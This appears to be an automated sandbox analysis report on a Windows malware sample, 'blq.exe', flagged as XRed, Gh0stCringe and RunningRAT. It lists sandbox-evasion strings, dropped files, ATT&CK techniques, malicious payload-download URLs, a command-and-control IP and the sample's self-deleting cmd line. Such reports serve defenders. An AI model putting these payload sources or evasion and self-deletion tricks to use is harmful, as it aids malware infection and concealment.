                          Source: Amcache.hve.18.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                          Source: Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3346246364.000002A314C5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.18.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: svchost.exe, 00000009.00000002.3346246364.000002A314C5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                          Source: Amcache.hve.18.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                          Source: svchost.exe, 00000009.00000002.3344318115.000002A30F62B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: Amcache.hve.18.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                          Source: Amcache.hve.18.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                          Source: Amcache.hve.18.drBinary or memory string: vmci.sys
                          Source: Amcache.hve.18.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                          Source: Amcache.hve.18.drBinary or memory string: vmci.syshbin`
                          Source: Amcache.hve.18.drBinary or memory string: \driver\vmci,\driver\pci
                          Source: Amcache.hve.18.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                          Source: Amcache.hve.18.drBinary or memory string: VMware20,1
                          Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Generation Counter
                          Source: Amcache.hve.18.drBinary or memory string: NECVMWar VMware SATA CD00
                          Source: Amcache.hve.18.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                          Source: Amcache.hve.18.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                          Source: Amcache.hve.18.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                          Source: Amcache.hve.18.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                          Source: Amcache.hve.18.drBinary or memory string: VMware PCI VMCI Bus Device
                          Source: Amcache.hve.18.drBinary or memory string: VMware VMCI Bus Device
                          Source: Amcache.hve.18.drBinary or memory string: VMware Virtual RAM
                          Source: Amcache.hve.18.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                          Source: Amcache.hve.18.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                          Source: C:\Windows\SysWOW64\encvbk.exeAPI call chain: ExitProcess graph end nodegraph_10-2037
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD5E4F LdrResolveDelayLoadedAPI,10_2_00DD5E4F
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD25B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,10_2_00DD25B2
                          Source: C:\Users\user\Desktop\._cache_blq.exeCode function: 1_2_00401B6B LoadLibraryA,GetProcAddress,__p__pgmptr,sprintf,GetCurrentProcess,SetPriorityClass,GetCurrentThread,SetThreadPriority,ShellExecuteA,1_2_00401B6B
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD3F6B mov esi, dword ptr fs:[00000030h]10_2_00DD3F6B
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10003D5D FreeLibrary,free,VirtualFree,GetProcessHeap,HeapFree,4_2_10003D5D
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD6510 SetUnhandledExceptionFilter,10_2_00DD6510
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD61C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00DD61C0
                          Source: C:\Users\user\Desktop\blq.exeProcess created: C:\Users\user\Desktop\._cache_blq.exe "C:\Users\user\Desktop\._cache_blq.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\blq.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16120
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16140
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7644 -ip 7644
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 16196
                          Source: C:\Users\user\Desktop\blq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_1000304F wsprintfA,strlen,strlen,strlen,GetLocalTime,wsprintfA,strlen,4_2_1000304F
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_1000336E ServiceMain,strncpy,wcstombs,RegisterServiceCtrlHandlerA,FreeConsole,GetVersionExA,MainThread,GetCurrentDirectoryA,lstrcatA,lstrcatA,lstrcatA,GetSystemDirectoryA,lstrcatA,CopyFileA,GetFileAttributesA,GetLastError,wsprintfA,GetModuleFileNameA,wsprintfA,Sleep,GetExitCodeProcess,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,4_2_1000336E
                          Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.18.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.18.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: ._cache_blq.exeBinary or memory string: 360tray.exe
                          Source: Amcache.hve.18.drBinary or memory string: MsMpEng.exe

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Gh0stCringe
                          Source: Yara matchFile source: 10.2.encvbk.exe.10000000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.._cache_blq.exe.4032a0.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.._cache_blq.exe.4032a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.4129317792.0000000010006000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ._cache_blq.exe PID: 7616, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7664, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: encvbk.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Program Files (x86)\6795234.dll, type: DROPPED
                          Yara detected RunningRAT
                          Source: Yara matchFile source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000000.1659507821.0000000000403000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ._cache_blq.exe PID: 7616, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPED
                          Yara detected XRed
                          Source: Yara matchFile source: blq.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: blq.exe PID: 7560, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXAFD2.tmp, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected Gh0stCringe
                          Source: Yara matchFile source: 10.2.encvbk.exe.10000000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.._cache_blq.exe.4032a0.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.._cache_blq.exe.4032a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.svchost.exe.10000000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.4129317792.0000000010006000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ._cache_blq.exe PID: 7616, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7664, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: encvbk.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Program Files (x86)\6795234.dll, type: DROPPED
                          Yara detected RunningRAT
                          Source: Yara matchFile source: 1.0.._cache_blq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000000.1659507821.0000000000403000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ._cache_blq.exe PID: 7616, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPED
                          Yara detected XRed
                          Source: Yara matchFile source: blq.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: blq.exe PID: 7560, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXAFD2.tmp, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information41
                          Scripting                          		1
                          Valid Accounts                          		11
                          Native API                          		41
                          Scripting                          		1
                          DLL Side-Loading                          		1
                          Obfuscated Files or Information                          		OS Credential Dumping1
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		4
                          Ingress Tool Transfer                          		Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomains1
                          Replication Through Removable Media                          		2
                          Command and Scripting Interpreter                          		1
                          DLL Side-Loading                          		1
                          Valid Accounts                          		1
                          Timestomp                          		LSASS Memory1
                          Peripheral Device Discovery                          		Remote Desktop ProtocolData from Removable Media11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts12
                          Service Execution                          		1
                          Valid Accounts                          		1
                          Access Token Manipulation                          		1
                          DLL Side-Loading                          		Security Account Manager3
                          File and Directory Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive1
                          Non-Standard Port                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCron22
                          Windows Service                          		22
                          Windows Service                          		1
                          File Deletion                          		NTDS35
                          System Information Discovery                          		Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchd1
                          Registry Run Keys / Startup Folder                          		12
                          Process Injection                          		142
                          Masquerading                          		LSA Secrets1
                          Query Registry                          		SSHKeylogging34
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                          Registry Run Keys / Startup Folder                          		1
                          Valid Accounts                          		Cached Domain Credentials151
                          Security Software Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Access Token Manipulation                          		DCSync31
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                          Virtualization/Sandbox Evasion                          		Proc Filesystem12
                          Process Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                          Process Injection                          		/etc/passwd and /etc/shadow11
                          Application Window Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                          Indicator Removal                          		Network Sniffing1
                          Remote System Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                          System Network Configuration Discovery                          		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580529 Sample: blq.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 64 freedns.afraid.org 2->64 66 xred.mooo.com 2->66 68 4 other IPs or domains 2->68 80 Suricata IDS alerts for network traffic 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 88 16 other signatures 2->88 9 blq.exe 1 6 2->9         started        12 svchost.exe 1 2->12         started        15 svchost.exe 2->15         started        17 5 other processes 2->17 signatures3 86 Uses dynamic DNS services 64->86 process4 file5 54 C:\Users\user\Desktop\._cache_blq.exe, PE32 9->54 dropped 56 C:\ProgramData\Synaptics\Synaptics.exe, PE32 9->56 dropped 58 C:\ProgramData\Synaptics\RCXAFD2.tmp, PE32 9->58 dropped 60 C:\...\Synaptics.exe:Zone.Identifier, ASCII 9->60 dropped 19 ._cache_blq.exe 5 2 9->19         started        23 Synaptics.exe 114 9->23         started        62 C:\Windows\SysWOW64\encvbk.exe, PE32 12->62 dropped 106 Drops executables to the windows directory (C:\Windows) and starts them 12->106 26 encvbk.exe 12->26         started        108 Checks if browser processes are running 15->108 28 WerFault.exe 17->28         started        30 WerFault.exe 17->30         started        32 WerFault.exe 17->32         started        34 splwow64.exe 17->34         started        signatures6 process7 dnsIp8 50 C:\Program Files (x86)\6795234.dll, PE32 19->50 dropped 90 Antivirus detection for dropped file 19->90 92 Found evasive API chain (may stop execution after checking mutex) 19->92 94 Self deletion via cmd or bat file 19->94 36 cmd.exe 19->36         started        70 drive.usercontent.google.com 142.250.181.1, 443, 49746, 49747 GOOGLEUS United States 23->70 72 docs.google.com 142.250.181.14, 443, 49734, 49735 GOOGLEUS United States 23->72 74 freedns.afraid.org 69.42.215.252, 49740, 80 AWKNET-LLCUS United States 23->74 52 C:\Users\user\Documents\DTBZGIOOSO\~$cache1, PE32 23->52 dropped 96 Multi AV Scanner detection for dropped file 23->96 98 Drops PE files to the document folder of the user 23->98 100 Machine Learning detection for dropped file 23->100 39 WerFault.exe 23->39         started        41 WerFault.exe 23->41         started        43 WerFault.exe 23->43         started        76 103.36.221.195, 49733, 8790 CHINA169-BJChinaUnicomBeijingProvinceNetworkCN China 26->76 file9 signatures10 process11 signatures12 102 Uses ping.exe to sleep 36->102 104 Uses ping.exe to check the status of other devices and networks 36->104 45 PING.EXE 36->45         started        48 conhost.exe 36->48         started        process13 dnsIp14 78 127.0.0.1 unknown unknown 45->78

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          blq.exe92%ReversingLabsWin32.Trojan.Synaptics
                          blq.exe100%AviraTR/AD.Farfli.qqkhu
                          blq.exe100%AviraTR/Dldr.Agent.SH
                          blq.exe100%AviraW2000M/Dldr.Agent.17651006
                          blq.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\Desktop\._cache_blq.exe100%AviraTR/AD.Farfli.qqkhu
                          C:\ProgramData\Synaptics\RCXAFD2.tmp100%AviraTR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\RCXAFD2.tmp100%AviraW2000M/Dldr.Agent.17651006
                          C:\Program Files (x86)\6795234.dll100%AviraBDS/Backdoor.Gen7
                          C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/AD.Farfli.qqkhu
                          C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                          C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                          C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%AviraTR/Dldr.Agent.SH
                          C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                          C:\ProgramData\Synaptics\RCXAFD2.tmp100%Joe Sandbox ML
                          C:\Program Files (x86)\6795234.dll100%Joe Sandbox ML
                          C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                          C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%Joe Sandbox ML
                          C:\ProgramData\Synaptics\RCXAFD2.tmp100%ReversingLabsWin32.Worm.Zorex
                          C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                          C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%ReversingLabsWin32.Worm.Zorex
                          C:\Windows\SysWOW64\encvbk.exe0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://xred.site50.net/syn/SUpdate.iniH))100%Avira URL Cloudmalware
                          http://xred.site50.net/syn/SUpdate.ini100%Avira URL Cloudmalware
                          http://xred.site50.net/syn/Synaptics.rar100%Avira URL Cloudmalware
                          http://xred.site50.net/syn/SSLLibrary.dlp100%Avira URL Cloudmalware
                          http://xred.site50.net/syn/SSLLibrary.dll100%Avira URL Cloudmalware

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          freedns.afraid.org
                          		69.42.215.252
                          		truefalse
                            		high
                            docs.google.com
                            		142.250.181.14
                            		truefalse
                              		high
                              drive.usercontent.google.com
                              		142.250.181.1
                              		truefalse
                                		high
                                s-part-0035.t-0009.t-msedge.net
                                		13.107.246.63
                                		truefalse
                                  		high
                                  xred.mooo.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    xred.mooo.comfalse
                                      		high
                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://docs.google.com/:Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drfalse
                                            		high
                                            https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drfalse
                                              		high
                                              https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, ~DF601ED631F8CE1B03.TMP.5.dr, Synaptics.exe.0.dr, ~$cache1.3.drfalse
                                                		high
                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978~Synaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://docs.google.com/xSynaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://xred.site50.net/syn/SUpdate.iniblq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drtrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://xred.site50.net/syn/SSLLibrary.dlpblq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://xred.site50.net/syn/SUpdate.iniH))blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978RSynaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://docs.google.com/lSynaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.usercontent.google.com/Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://xred.site50.net/syn/Synaptics.rarblq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drtrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
